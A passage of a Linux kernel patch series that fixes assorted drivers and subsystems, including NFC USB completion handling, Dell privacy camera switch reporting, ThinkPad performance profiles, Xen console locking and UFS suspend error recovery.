+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_ptp.c
+@@ -219,7 +219,10 @@ static int stmmac_enable(struct ptp_clock_info *ptp,
+ 		}
+ 		writel(acr_value, ptpaddr + PTP_ACR);
+ 		mutex_unlock(&priv->aux_ts_lock);
+-		ret = 0;
++		/* wait for auxts fifo clear to finish */
++		ret = readl_poll_timeout(ptpaddr + PTP_ACR, acr_value,
++					 !(acr_value & PTP_ACR_ATSFC),
++					 10, 10000);
+ 		break;
+ 
+ 	default:
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/of.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/of.c
+index a83699de01ec3..fdd0c9abc1a10 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/of.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/of.c
+@@ -79,7 +79,8 @@ void brcmf_of_probe(struct device *dev, enum brcmf_bus_type bus_type,
+ 	/* Apple ARM64 platforms have their own idea of board type, passed in
+ 	 * via the device tree. They also have an antenna SKU parameter
+ 	 */
+-	if (!of_property_read_string(np, "brcm,board-type", &prop))
++	err = of_property_read_string(np, "brcm,board-type", &prop);
++	if (!err)
+ 		settings->board_type = prop;
+ 
+ 	if (!of_property_read_string(np, "apple,antenna-sku", &prop))
+@@ -87,7 +88,7 @@ void brcmf_of_probe(struct device *dev, enum brcmf_bus_type bus_type,
+ 
+ 	/* Set board-type to the first string of the machine compatible prop */
+ 	root = of_find_node_by_path("/");
+-	if (root && !settings->board_type) {
++	if (root && err) {
+ 		char *board_type;
+ 		const char *tmp;
+ 
+diff --git a/drivers/nfc/pn533/usb.c b/drivers/nfc/pn533/usb.c
+index 6f71ac72012ea..ed9c5e2cf3ad4 100644
+--- a/drivers/nfc/pn533/usb.c
++++ b/drivers/nfc/pn533/usb.c
+@@ -153,10 +153,17 @@ static int pn533_usb_send_ack(struct pn533 *dev, gfp_t flags)
+ 	return usb_submit_urb(phy->ack_urb, flags);
+ }
+ 
++struct pn533_out_arg {
++	struct pn533_usb_phy *phy;
++	struct completion done;
++};
++
+ static int pn533_usb_send_frame(struct pn533 *dev,
+ 				struct sk_buff *out)
+ {
+ 	struct pn533_usb_phy *phy = dev->phy;
++	struct pn533_out_arg arg;
++	void *cntx;
+ 	int rc;
+ 
+ 	if (phy->priv == NULL)
+@@ -168,10 +175,17 @@ static int pn533_usb_send_frame(struct pn533 *dev,
+ 	print_hex_dump_debug("PN533 TX: ", DUMP_PREFIX_NONE, 16, 1,
+ 			     out->data, out->len, false);
+ 
++	init_completion(&arg.done);
++	cntx = phy->out_urb->context;
++	phy->out_urb->context = &arg;
++
+ 	rc = usb_submit_urb(phy->out_urb, GFP_KERNEL);
+ 	if (rc)
+ 		return rc;
+ 
++	wait_for_completion(&arg.done);
++	phy->out_urb->context = cntx;
++
+ 	if (dev->protocol_type == PN533_PROTO_REQ_RESP) {
+ 		/* request for response for sent packet directly */
+ 		rc = pn533_submit_urb_for_response(phy, GFP_KERNEL);
+@@ -408,7 +422,31 @@ static int pn533_acr122_poweron_rdr(struct pn533_usb_phy *phy)
+ 	return arg.rc;
+ }
+ 
+-static void pn533_send_complete(struct urb *urb)
++static void pn533_out_complete(struct urb *urb)
++{
++	struct pn533_out_arg *arg = urb->context;
++	struct pn533_usb_phy *phy = arg->phy;
++
++	switch (urb->status) {
++	case 0:
++		break; /* success */
++	case -ECONNRESET:
++	case -ENOENT:
++		dev_dbg(&phy->udev->dev,
++			"The urb has been stopped (status %d)\n",
++			urb->status);
++		break;
++	case -ESHUTDOWN:
++	default:
++		nfc_err(&phy->udev->dev,
++			"Urb failure (status %d)\n",
++			urb->status);
++	}
++
++	complete(&arg->done);
++}
++
++static void pn533_ack_complete(struct urb *urb)
+ {
+ 	struct pn533_usb_phy *phy = urb->context;
+ 
+@@ -496,10 +534,10 @@ static int pn533_usb_probe(struct usb_interface *interface,
+ 
+ 	usb_fill_bulk_urb(phy->out_urb, phy->udev,
+ 			  usb_sndbulkpipe(phy->udev, out_endpoint),
+-			  NULL, 0, pn533_send_complete, phy);
++			  NULL, 0, pn533_out_complete, phy);
+ 	usb_fill_bulk_urb(phy->ack_urb, phy->udev,
+ 			  usb_sndbulkpipe(phy->udev, out_endpoint),
+-			  NULL, 0, pn533_send_complete, phy);
++			  NULL, 0, pn533_ack_complete, phy);
+ 
+ 	switch (id->driver_info) {
+ 	case PN533_DEVICE_STD:
+diff --git a/drivers/nvme/host/multipath.c b/drivers/nvme/host/multipath.c
+index 7e025b8948cbf..d09ed00701743 100644
+--- a/drivers/nvme/host/multipath.c
++++ b/drivers/nvme/host/multipath.c
+@@ -351,6 +351,8 @@ static void nvme_ns_head_submit_bio(struct bio *bio)
+ 	 * pool from the original queue to allocate the bvecs from.
+ 	 */
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	srcu_idx = srcu_read_lock(&head->srcu);
+ 	ns = nvme_find_path(head);
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 6be8968717182..9bc6e3922e78e 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -628,13 +628,15 @@ static bool do_amd_gpio_irq_handler(int irq, void *dev_id)
+ 		/* Each status bit covers four pins */
+ 		for (i = 0; i < 4; i++) {
+ 			regval = readl(regs + i);
+-			/* caused wake on resume context for shared IRQ */
+-			if (irq < 0 && (regval & BIT(WAKE_STS_OFF))) {
++
++			if (regval & PIN_IRQ_PENDING)
+ 				dev_dbg(&gpio_dev->pdev->dev,
+-					"Waking due to GPIO %d: 0x%x",
++					"GPIO %d is active: 0x%x",
+ 					irqnr + i, regval);
++
++			/* caused wake on resume context for shared IRQ */
++			if (irq < 0 && (regval & BIT(WAKE_STS_OFF)))
+ 				return true;
+-			}
+ 
+ 			if (!(regval & PIN_IRQ_PENDING) ||
+ 			    !(regval & BIT(INTERRUPT_MASK_OFF)))
+diff --git a/drivers/platform/surface/aggregator/controller.c b/drivers/platform/surface/aggregator/controller.c
+index 43e7651991371..c6537a1b3a2ec 100644
+--- a/drivers/platform/surface/aggregator/controller.c
++++ b/drivers/platform/surface/aggregator/controller.c
+@@ -1700,8 +1700,10 @@ int ssam_request_sync(struct ssam_controller *ctrl,
+ 		return status;
+ 
+ 	status = ssam_request_sync_init(rqst, spec->flags);
+-	if (status)
++	if (status) {
++		ssam_request_sync_free(rqst);
+ 		return status;
++	}
+ 
+ 	ssam_request_sync_set_resp(rqst, rsp);
+ 
+diff --git a/drivers/platform/surface/aggregator/ssh_request_layer.c b/drivers/platform/surface/aggregator/ssh_request_layer.c
+index f5565570f16c7..69132976d297e 100644
+--- a/drivers/platform/surface/aggregator/ssh_request_layer.c
++++ b/drivers/platform/surface/aggregator/ssh_request_layer.c
+@@ -916,6 +916,20 @@ static void ssh_rtl_rx_command(struct ssh_ptl *p, const struct ssam_span *data)
+ 	if (sshp_parse_command(dev, data, &command, &command_data))
+ 		return;
+ 
++	/*
++	 * Check if the message was intended for us. If not, drop it.
++	 *
++	 * Note: We will need to change this to handle debug messages. On newer
++	 * generation devices, these seem to be sent to tid_out=0x03. We as
++	 * host can still receive them as they can be forwarded via an override
++	 * option on SAM, but doing so does not change tid_out=0x00.
++	 */
++	if (command->tid_out != 0x00) {
++		rtl_warn(rtl, "rtl: dropping message not intended for us (tid = %#04x)\n",
++			 command->tid_out);
++		return;
++	}
++
+ 	if (ssh_rqid_is_event(get_unaligned_le16(&command->rqid)))
+ 		ssh_rtl_rx_event(rtl, command, &command_data);
+ 	else
+diff --git a/drivers/platform/x86/amd/pmc.c b/drivers/platform/x86/amd/pmc.c
+index 439d282aafd19..8d924986381be 100644
+--- a/drivers/platform/x86/amd/pmc.c
++++ b/drivers/platform/x86/amd/pmc.c
+@@ -932,7 +932,7 @@ static int amd_pmc_probe(struct platform_device *pdev)
+ 	if (enable_stb && (dev->cpu_id == AMD_CPU_ID_YC || dev->cpu_id == AMD_CPU_ID_CB)) {
+ 		err = amd_pmc_s2d_init(dev);
+ 		if (err)
+-			return err;
++			goto err_pci_dev_put;
+ 	}
+ 
+ 	platform_set_drvdata(pdev, dev);
+diff --git a/drivers/platform/x86/asus-wmi.c b/drivers/platform/x86/asus-wmi.c
+index 872efc1d5b36b..f051b21653d61 100644
+--- a/drivers/platform/x86/asus-wmi.c
++++ b/drivers/platform/x86/asus-wmi.c
+@@ -2436,6 +2436,9 @@ static int fan_curve_check_present(struct asus_wmi *asus, bool *available,
+ 
+ 	*available = false;
+ 
++	if (asus->fan_type == FAN_TYPE_NONE)
++		return 0;
++
+ 	err = fan_curve_get_factory_default(asus, fan_dev);
+ 	if (err) {
+ 		return 0;
+diff --git a/drivers/platform/x86/dell/dell-wmi-privacy.c b/drivers/platform/x86/dell/dell-wmi-privacy.c
+index c82b3d6867c5b..c517bd45dd32e 100644
+--- a/drivers/platform/x86/dell/dell-wmi-privacy.c
++++ b/drivers/platform/x86/dell/dell-wmi-privacy.c
+@@ -61,7 +61,7 @@ static const struct key_entry dell_wmi_keymap_type_0012[] = {
+ 	/* privacy mic mute */
+ 	{ KE_KEY, 0x0001, { KEY_MICMUTE } },
+ 	/* privacy camera mute */
+-	{ KE_SW,  0x0002, { SW_CAMERA_LENS_COVER } },
++	{ KE_VSW, 0x0002, { SW_CAMERA_LENS_COVER } },
+ 	{ KE_END, 0},
+ };
+ 
+@@ -115,11 +115,15 @@ bool dell_privacy_process_event(int type, int code, int status)
+ 
+ 	switch (code) {
+ 	case DELL_PRIVACY_AUDIO_EVENT: /* Mic mute */
+-	case DELL_PRIVACY_CAMERA_EVENT: /* Camera mute */
+ 		priv->last_status = status;
+ 		sparse_keymap_report_entry(priv->input_dev, key, 1, true);
+ 		ret = true;
+ 		break;
++	case DELL_PRIVACY_CAMERA_EVENT: /* Camera mute */
++		priv->last_status = status;
++		sparse_keymap_report_entry(priv->input_dev, key, !(status & CAMERA_STATUS), false);
++		ret = true;
++		break;
+ 	default:
+ 		dev_dbg(&priv->wdev->dev, "unknown event type 0x%04x 0x%04x\n", type, code);
+ 	}
+@@ -292,7 +296,7 @@ static int dell_privacy_wmi_probe(struct wmi_device *wdev, const void *context)
+ {
+ 	struct privacy_wmi_data *priv;
+ 	struct key_entry *keymap;
+-	int ret, i;
++	int ret, i, j;
+ 
+ 	ret = wmi_has_guid(DELL_PRIVACY_GUID);
+ 	if (!ret)
+@@ -304,6 +308,11 @@ static int dell_privacy_wmi_probe(struct wmi_device *wdev, const void *context)
+ 
+ 	dev_set_drvdata(&wdev->dev, priv);
+ 	priv->wdev = wdev;
++
++	ret = get_current_status(priv->wdev);
++	if (ret)
++		return ret;
++
+ 	/* create evdev passing interface */
+ 	priv->input_dev = devm_input_allocate_device(&wdev->dev);
+ 	if (!priv->input_dev)
+@@ -318,9 +327,20 @@ static int dell_privacy_wmi_probe(struct wmi_device *wdev, const void *context)
+ 	/* remap the keymap code with Dell privacy key type 0x12 as prefix
+ 	 * KEY_MICMUTE scancode will be reported as 0x120001
+ 	 */
+-	for (i = 0; i < ARRAY_SIZE(dell_wmi_keymap_type_0012); i++) {
+-		keymap[i] = dell_wmi_keymap_type_0012[i];
+-		keymap[i].code |= (0x0012 << 16);
++	for (i = 0, j = 0; i < ARRAY_SIZE(dell_wmi_keymap_type_0012); i++) {
++		/*
++		 * Unlike keys where only presses matter, userspace may act
++		 * on switches in both of their positions. Only register
++		 * SW_CAMERA_LENS_COVER if it is actually there.
++		 */
++		if (dell_wmi_keymap_type_0012[i].type == KE_VSW &&
++		    dell_wmi_keymap_type_0012[i].sw.code == SW_CAMERA_LENS_COVER &&
++		    !(priv->features_present & BIT(DELL_PRIVACY_TYPE_CAMERA)))
++			continue;
++
++		keymap[j] = dell_wmi_keymap_type_0012[i];
++		keymap[j].code |= (0x0012 << 16);
++		j++;
+ 	}
+ 	ret = sparse_keymap_setup(priv->input_dev, keymap, NULL);
+ 	kfree(keymap);
+@@ -331,11 +351,12 @@ static int dell_privacy_wmi_probe(struct wmi_device *wdev, const void *context)
+ 	priv->input_dev->name = "Dell Privacy Driver";
+ 	priv->input_dev->id.bustype = BUS_HOST;
+ 
+-	ret = input_register_device(priv->input_dev);
+-	if (ret)
+-		return ret;
++	/* Report initial camera-cover status */
++	if (priv->features_present & BIT(DELL_PRIVACY_TYPE_CAMERA))
++		input_report_switch(priv->input_dev, SW_CAMERA_LENS_COVER,
++				    !(priv->last_status & CAMERA_STATUS));
+ 
+-	ret = get_current_status(priv->wdev);
++	ret = input_register_device(priv->input_dev);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/platform/x86/ideapad-laptop.c b/drivers/platform/x86/ideapad-laptop.c
+index fc3d47a759443..4e28c55f0ea52 100644
+--- a/drivers/platform/x86/ideapad-laptop.c
++++ b/drivers/platform/x86/ideapad-laptop.c
+@@ -1615,6 +1615,12 @@ static const struct dmi_system_id set_fn_lock_led_list[] = {
+ 			DMI_MATCH(DMI_PRODUCT_VERSION, "Lenovo Legion R7000P2020H"),
+ 		}
+ 	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "Lenovo Legion 5 15ARH05"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/drivers/platform/x86/intel/int3472/clk_and_regulator.c b/drivers/platform/x86/intel/int3472/clk_and_regulator.c
+index b2342b3d78c72..74dc2cff799ee 100644
+--- a/drivers/platform/x86/intel/int3472/clk_and_regulator.c
++++ b/drivers/platform/x86/intel/int3472/clk_and_regulator.c
+@@ -181,6 +181,9 @@ int skl_int3472_register_regulator(struct int3472_discrete_device *int3472,
+ 		return PTR_ERR(int3472->regulator.gpio);
+ 	}
+ 
++	/* Ensure the pin is in output mode and non-active state */
++	gpiod_direction_output(int3472->regulator.gpio, 0);
++
+ 	cfg.dev = &int3472->adev->dev;
+ 	cfg.init_data = &init_data;
+ 	cfg.ena_gpiod = int3472->regulator.gpio;
+diff --git a/drivers/platform/x86/intel/int3472/discrete.c b/drivers/platform/x86/intel/int3472/discrete.c
+index 974a132db6516..c42c3faa2c32d 100644
+--- a/drivers/platform/x86/intel/int3472/discrete.c
++++ b/drivers/platform/x86/intel/int3472/discrete.c
+@@ -168,6 +168,8 @@ static int skl_int3472_map_gpio_to_clk(struct int3472_discrete_device *int3472,
+ 			return (PTR_ERR(gpio));
+ 
+ 		int3472->clock.ena_gpio = gpio;
++		/* Ensure the pin is in output mode and non-active state */
++		gpiod_direction_output(int3472->clock.ena_gpio, 0);
+ 		break;
+ 	case INT3472_GPIO_TYPE_PRIVACY_LED:
+ 		gpio = acpi_get_and_request_gpiod(path, pin, "int3472,privacy-led");
+@@ -175,6 +177,8 @@ static int skl_int3472_map_gpio_to_clk(struct int3472_discrete_device *int3472,
+ 			return (PTR_ERR(gpio));
+ 
+ 		int3472->clock.led_gpio = gpio;
++		/* Ensure the pin is in output mode and non-active state */
++		gpiod_direction_output(int3472->clock.led_gpio, 0);
+ 		break;
+ 	default:
+ 		dev_err(int3472->dev, "Invalid GPIO type 0x%02x for clock\n", type);
+diff --git a/drivers/platform/x86/sony-laptop.c b/drivers/platform/x86/sony-laptop.c
+index 765fcaba4d121..5ff5aaf92b56e 100644
+--- a/drivers/platform/x86/sony-laptop.c
++++ b/drivers/platform/x86/sony-laptop.c
+@@ -1888,14 +1888,21 @@ static int sony_nc_kbd_backlight_setup(struct platform_device *pd,
+ 		break;
+ 	}
+ 
+-	ret = sony_call_snc_handle(handle, probe_base, &result);
+-	if (ret)
+-		return ret;
++	/*
++	 * Only probe if there is a separate probe_base, otherwise the probe call
++	 * is equivalent to __sony_nc_kbd_backlight_mode_set(0), resulting in
++	 * the keyboard backlight being turned off.
++	 */
++	if (probe_base) {
++		ret = sony_call_snc_handle(handle, probe_base, &result);
++		if (ret)
++			return ret;
+ 
+-	if ((handle == 0x0137 && !(result & 0x02)) ||
+-			!(result & 0x01)) {
+-		dprintk("no backlight keyboard found\n");
+-		return 0;
++		if ((handle == 0x0137 && !(result & 0x02)) ||
++				!(result & 0x01)) {
++			dprintk("no backlight keyboard found\n");
++			return 0;
++		}
+ 	}
+ 
+ 	kbdbl_ctl = kzalloc(sizeof(*kbdbl_ctl), GFP_KERNEL);
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index a1d91736a03b8..4e95d2243161a 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -10315,9 +10315,11 @@ static DEFINE_MUTEX(dytc_mutex);
+ static int dytc_capabilities;
+ static bool dytc_mmc_get_available;
+ 
+-static int convert_dytc_to_profile(int dytcmode, enum platform_profile_option *profile)
++static int convert_dytc_to_profile(int funcmode, int dytcmode,
++		enum platform_profile_option *profile)
+ {
+-	if (dytc_capabilities & BIT(DYTC_FC_MMC)) {
++	switch (funcmode) {
++	case DYTC_FUNCTION_MMC:
+ 		switch (dytcmode) {
+ 		case DYTC_MODE_MMC_LOWPOWER:
+ 			*profile = PLATFORM_PROFILE_LOW_POWER;
+@@ -10333,8 +10335,7 @@ static int convert_dytc_to_profile(int dytcmode, enum platform_profile_option *p
+ 			return -EINVAL;
+ 		}
+ 		return 0;
+-	}
+-	if (dytc_capabilities & BIT(DYTC_FC_PSC)) {
++	case DYTC_FUNCTION_PSC:
+ 		switch (dytcmode) {
+ 		case DYTC_MODE_PSC_LOWPOWER:
+ 			*profile = PLATFORM_PROFILE_LOW_POWER;
+@@ -10348,6 +10349,14 @@ static int convert_dytc_to_profile(int dytcmode, enum platform_profile_option *p
+ 		default: /* Unknown mode */
+ 			return -EINVAL;
+ 		}
++		return 0;
++	case DYTC_FUNCTION_AMT:
++		/* For now return balanced. It's the closest we have to 'auto' */
++		*profile =  PLATFORM_PROFILE_BALANCED;
++		return 0;
++	default:
++		/* Unknown function */
++		return -EOPNOTSUPP;
+ 	}
+ 	return 0;
+ }
+@@ -10496,6 +10505,7 @@ static int dytc_profile_set(struct platform_profile_handler *pprof,
+ 		err = dytc_command(DYTC_SET_COMMAND(DYTC_FUNCTION_PSC, perfmode, 1), &output);
+ 		if (err)
+ 			goto unlock;
++
+ 		/* system supports AMT, activate it when on balanced */
+ 		if (dytc_capabilities & BIT(DYTC_FC_AMT))
+ 			dytc_control_amt(profile == PLATFORM_PROFILE_BALANCED);
+@@ -10511,7 +10521,7 @@ static void dytc_profile_refresh(void)
+ {
+ 	enum platform_profile_option profile;
+ 	int output, err = 0;
+-	int perfmode;
++	int perfmode, funcmode;
+ 
+ 	mutex_lock(&dytc_mutex);
+ 	if (dytc_capabilities & BIT(DYTC_FC_MMC)) {
+@@ -10526,8 +10536,9 @@ static void dytc_profile_refresh(void)
+ 	if (err)
+ 		return;
+ 
++	funcmode = (output >> DYTC_GET_FUNCTION_BIT) & 0xF;
+ 	perfmode = (output >> DYTC_GET_MODE_BIT) & 0xF;
+-	convert_dytc_to_profile(perfmode, &profile);
++	convert_dytc_to_profile(funcmode, perfmode, &profile);
+ 	if (profile != dytc_current_profile) {
+ 		dytc_current_profile = profile;
+ 		platform_profile_notify();
+diff --git a/drivers/regulator/da9211-regulator.c b/drivers/regulator/da9211-regulator.c
+index e01b32d1fa17d..00828f5baa972 100644
+--- a/drivers/regulator/da9211-regulator.c
++++ b/drivers/regulator/da9211-regulator.c
+@@ -498,6 +498,12 @@ static int da9211_i2c_probe(struct i2c_client *i2c)
+ 
+ 	chip->chip_irq = i2c->irq;
+ 
++	ret = da9211_regulator_init(chip);
++	if (ret < 0) {
++		dev_err(chip->dev, "Failed to initialize regulator: %d\n", ret);
++		return ret;
++	}
++
+ 	if (chip->chip_irq != 0) {
+ 		ret = devm_request_threaded_irq(chip->dev, chip->chip_irq, NULL,
+ 					da9211_irq_handler,
+@@ -512,11 +518,6 @@ static int da9211_i2c_probe(struct i2c_client *i2c)
+ 		dev_warn(chip->dev, "No IRQ configured\n");
+ 	}
+ 
+-	ret = da9211_regulator_init(chip);
+-
+-	if (ret < 0)
+-		dev_err(chip->dev, "Failed to initialize regulator: %d\n", ret);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/s390/block/dcssblk.c b/drivers/s390/block/dcssblk.c
+index b392b9f5482e0..c0f85ffb2b62d 100644
+--- a/drivers/s390/block/dcssblk.c
++++ b/drivers/s390/block/dcssblk.c
+@@ -865,6 +865,8 @@ dcssblk_submit_bio(struct bio *bio)
+ 	unsigned long bytes_done;
+ 
+ 	bio = bio_split_to_limits(bio);
++	if (!bio)
++		return;
+ 
+ 	bytes_done = 0;
+ 	dev_info = bio->bi_bdev->bd_disk->private_data;
+diff --git a/drivers/scsi/mpi3mr/Makefile b/drivers/scsi/mpi3mr/Makefile
+index ef86ca46646b8..3bf8cf34e1c3f 100644
+--- a/drivers/scsi/mpi3mr/Makefile
++++ b/drivers/scsi/mpi3mr/Makefile
+@@ -1,5 +1,5 @@
+ # mpi3mr makefile
+-obj-m += mpi3mr.o
++obj-$(CONFIG_SCSI_MPI3MR) += mpi3mr.o
+ mpi3mr-y +=  mpi3mr_os.o     \
+ 		mpi3mr_fw.o \
+ 		mpi3mr_app.o \
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 3c5b7e4227b25..55d6fb4526804 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -1823,6 +1823,9 @@ static int storvsc_queuecommand(struct Scsi_Host *host, struct scsi_cmnd *scmnd)
+ 	ret = storvsc_do_io(dev, cmd_request, get_cpu());
+ 	put_cpu();
+ 
++	if (ret)
++		scsi_dma_unmap(scmnd);
++
+ 	if (ret == -EAGAIN) {
+ 		/* no more space */
+ 		ret = SCSI_MLQUEUE_DEVICE_BUSY;
+diff --git a/drivers/tty/hvc/hvc_xen.c b/drivers/tty/hvc/hvc_xen.c
+index 7c23112dc923f..37809c6c027fc 100644
+--- a/drivers/tty/hvc/hvc_xen.c
++++ b/drivers/tty/hvc/hvc_xen.c
+@@ -52,17 +52,22 @@ static DEFINE_SPINLOCK(xencons_lock);
+ 
+ static struct xencons_info *vtermno_to_xencons(int vtermno)
+ {
+-	struct xencons_info *entry, *n, *ret = NULL;
++	struct xencons_info *entry, *ret = NULL;
++	unsigned long flags;
+ 
+-	if (list_empty(&xenconsoles))
+-			return NULL;
++	spin_lock_irqsave(&xencons_lock, flags);
++	if (list_empty(&xenconsoles)) {
++		spin_unlock_irqrestore(&xencons_lock, flags);
++		return NULL;
++	}
+ 
+-	list_for_each_entry_safe(entry, n, &xenconsoles, list) {
++	list_for_each_entry(entry, &xenconsoles, list) {
+ 		if (entry->vtermno == vtermno) {
+ 			ret  = entry;
+ 			break;
+ 		}
+ 	}
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 
+ 	return ret;
+ }
+@@ -223,7 +228,7 @@ static int xen_hvm_console_init(void)
+ {
+ 	int r;
+ 	uint64_t v = 0;
+-	unsigned long gfn;
++	unsigned long gfn, flags;
+ 	struct xencons_info *info;
+ 
+ 	if (!xen_hvm_domain())
+@@ -258,9 +263,9 @@ static int xen_hvm_console_init(void)
+ 		goto err;
+ 	info->vtermno = HVC_COOKIE;
+ 
+-	spin_lock(&xencons_lock);
++	spin_lock_irqsave(&xencons_lock, flags);
+ 	list_add_tail(&info->list, &xenconsoles);
+-	spin_unlock(&xencons_lock);
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 
+ 	return 0;
+ err:
+@@ -283,6 +288,7 @@ static int xencons_info_pv_init(struct xencons_info *info, int vtermno)
+ static int xen_pv_console_init(void)
+ {
+ 	struct xencons_info *info;
++	unsigned long flags;
+ 
+ 	if (!xen_pv_domain())
+ 		return -ENODEV;
+@@ -299,9 +305,9 @@ static int xen_pv_console_init(void)
+ 		/* already configured */
+ 		return 0;
+ 	}
+-	spin_lock(&xencons_lock);
++	spin_lock_irqsave(&xencons_lock, flags);
+ 	xencons_info_pv_init(info, HVC_COOKIE);
+-	spin_unlock(&xencons_lock);
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 
+ 	return 0;
+ }
+@@ -309,6 +315,7 @@ static int xen_pv_console_init(void)
+ static int xen_initial_domain_console_init(void)
+ {
+ 	struct xencons_info *info;
++	unsigned long flags;
+ 
+ 	if (!xen_initial_domain())
+ 		return -ENODEV;
+@@ -323,9 +330,9 @@ static int xen_initial_domain_console_init(void)
+ 	info->irq = bind_virq_to_irq(VIRQ_CONSOLE, 0, false);
+ 	info->vtermno = HVC_COOKIE;
+ 
+-	spin_lock(&xencons_lock);
++	spin_lock_irqsave(&xencons_lock, flags);
+ 	list_add_tail(&info->list, &xenconsoles);
+-	spin_unlock(&xencons_lock);
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 
+ 	return 0;
+ }
+@@ -380,10 +387,12 @@ static void xencons_free(struct xencons_info *info)
+ 
+ static int xen_console_remove(struct xencons_info *info)
+ {
++	unsigned long flags;
++
+ 	xencons_disconnect_backend(info);
+-	spin_lock(&xencons_lock);
++	spin_lock_irqsave(&xencons_lock, flags);
+ 	list_del(&info->list);
+-	spin_unlock(&xencons_lock);
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 	if (info->xbdev != NULL)
+ 		xencons_free(info);
+ 	else {
+@@ -464,6 +473,7 @@ static int xencons_probe(struct xenbus_device *dev,
+ {
+ 	int ret, devid;
+ 	struct xencons_info *info;
++	unsigned long flags;
+ 
+ 	devid = dev->nodename[strlen(dev->nodename) - 1] - '0';
+ 	if (devid == 0)
+@@ -482,9 +492,9 @@ static int xencons_probe(struct xenbus_device *dev,
+ 	ret = xencons_connect_backend(dev, info);
+ 	if (ret < 0)
+ 		goto error;
+-	spin_lock(&xencons_lock);
++	spin_lock_irqsave(&xencons_lock, flags);
+ 	list_add_tail(&info->list, &xenconsoles);
+-	spin_unlock(&xencons_lock);
++	spin_unlock_irqrestore(&xencons_lock, flags);
+ 
+ 	return 0;
+ 
+@@ -584,10 +594,12 @@ static int __init xen_hvc_init(void)
+ 
+ 	info->hvc = hvc_alloc(HVC_COOKIE, info->irq, ops, 256);
+ 	if (IS_ERR(info->hvc)) {
++		unsigned long flags;
++
+ 		r = PTR_ERR(info->hvc);
+-		spin_lock(&xencons_lock);
++		spin_lock_irqsave(&xencons_lock, flags);
+ 		list_del(&info->list);
+-		spin_unlock(&xencons_lock);
++		spin_unlock_irqrestore(&xencons_lock, flags);
+ 		if (info->irq)
+ 			unbind_from_irqhandler(info->irq, NULL);
+ 		kfree(info);
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index d1db6be801560..b048357d21e36 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -6094,6 +6094,14 @@ void ufshcd_schedule_eh_work(struct ufs_hba *hba)
+ 	}
+ }
+ 
++static void ufshcd_force_error_recovery(struct ufs_hba *hba)
++{
++	spin_lock_irq(hba->host->host_lock);
++	hba->force_reset = true;
++	ufshcd_schedule_eh_work(hba);
++	spin_unlock_irq(hba->host->host_lock);
++}
++
+ static void ufshcd_clk_scaling_allow(struct ufs_hba *hba, bool allow)
+ {
+ 	down_write(&hba->clk_scaling_lock);
+@@ -9066,6 +9074,15 @@ static int __ufshcd_wl_suspend(struct ufs_hba *hba, enum ufs_pm_op pm_op)
+ 
+ 		if (!hba->dev_info.b_rpm_dev_flush_capable) {
+ 			ret = ufshcd_set_dev_pwr_mode(hba, req_dev_pwr_mode);
++			if (ret && pm_op != UFS_SHUTDOWN_PM) {
++				/*
++				 * If return err in suspend flow, IO will hang.
++				 * Trigger error handler and break suspend for
++				 * error recovery.
++				 */
++				ufshcd_force_error_recovery(hba);
++				ret = -EBUSY;
++			}
+ 			if (ret)
+ 				goto enable_scaling;
+ 		}
+@@ -9077,6 +9094,15 @@ static int __ufshcd_wl_suspend(struct ufs_hba *hba, enum ufs_pm_op pm_op)
+ 	 */
+ 	check_for_bkops = !ufshcd_is_ufs_dev_deepsleep(hba);
+ 	ret = ufshcd_link_state_transition(hba, req_link_state, check_for_bkops);
++	if (ret && pm_op != UFS_SHUTDOWN_PM) {
++		/*
++		 * If return err in suspend flow, IO will hang.
++		 * Trigger error handler and break suspend for
++		 * error recovery.
++		 */
++		ufshcd_force_error_recovery(hba);
++		ret = -EBUSY;
++	}
+ 	if (ret)
+ 		goto set_dev_active;
+ 
+diff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c
+index 6a11025e58502..444302afc673a 100644
+--- a/fs/binfmt_elf.c
++++ b/fs/binfmt_elf.c
+@@ -2209,7 +2209,7 @@ static int elf_core_dump(struct coredump_params *cprm)
+ 	 * The number of segs are recored into ELF header as 16bit value.
+ 	 * Please check DEFAULT_MAX_MAP_COUNT definition when you modify here.
+ 	 */
+-	segs = cprm->vma_count + elf_core_extra_phdrs();
++	segs = cprm->vma_count + elf_core_extra_phdrs(cprm);
+ 
+ 	/* for notes section */
+ 	segs++;
+@@ -2249,7 +2249,7 @@ static int elf_core_dump(struct coredump_params *cprm)
+ 	dataoff = offset = roundup(offset, ELF_EXEC_PAGESIZE);
+ 
+ 	offset += cprm->vma_data_size;
+-	offset += elf_core_extra_data_size();
++	offset += elf_core_extra_data_size(cprm);
+ 	e_shoff = offset;
+ 
+ 	if (e_phnum == PN_XNUM) {
+diff --git a/fs/binfmt_elf_fdpic.c b/fs/binfmt_elf_fdpic.c
